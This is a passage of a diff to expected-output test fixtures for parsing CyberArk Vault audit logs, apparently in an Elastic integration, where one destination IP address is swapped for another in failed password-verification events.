\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:33:26\",\"IsoTimestamp\":\"2021-03-15T13:33:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=34.66.114.180;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615815206\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
", + "ingested": "2021-12-09T13:37:01.193608300Z", + "original": "\u003c7\u003e1 2021-03-15T13:33:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:33:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:33:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615815206\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:33:26\",\"IsoTimestamp\":\"2021-03-15T13:33:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615815206\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", @@ -371,22 +338,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "ELASTIC.local\\bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -409,7 +365,7 @@ }, "@timestamp": "2021-03-15T15:04:11.000Z", "file": { - "path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart" }, "ecs": { "version": "1.12.0" 
@@ -421,28 +377,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n", "iso_timestamp": "2021-03-15T15:04:11Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 08:04:11\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T15:04:11Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n 
\u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615820651\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 08:04:11\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T15:04:11Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615820651\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "1", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC.local\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -451,11 +407,11 @@ "retries_count": "1", "reset_immediately": "VerifyTask", "last_task": "VerifyTask", - "cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cpm_error_details": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", "last_fail_date": "1615820651", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password Failed", 
@@ -468,9 +424,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-06-09T10:24:34.493907200Z", - "original": "\u003c7\u003e1 2021-03-15T15:04:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:04:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:04:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=1;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615820651\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:04:11\",\"IsoTimestamp\":\"2021-03-15T15:04:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=1;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615820651\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
", + "ingested": "2021-12-09T13:37:01.193614100Z", + "original": "\u003c7\u003e1 2021-03-15T15:04:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:04:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:04:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615820651\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
